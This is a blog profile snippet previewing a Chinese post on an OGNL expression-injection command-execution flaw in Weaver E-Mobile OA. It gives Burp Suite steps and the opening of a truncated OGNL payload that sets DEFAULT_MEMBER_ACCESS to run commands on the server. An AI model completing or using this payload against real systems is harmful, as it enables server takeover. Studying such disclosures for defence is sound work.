- 博客(1)
- 收藏
- 关注
原创 泛微 E-Mobile Ognl 表达式注入
泛微OA办公系统是一款协调办公软件。泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。使用bp抓包发送到重发器更改请求头为POST一执行下面面的代码就直接执行命令了message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse...
2021-07-30 17:02:57 3891
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人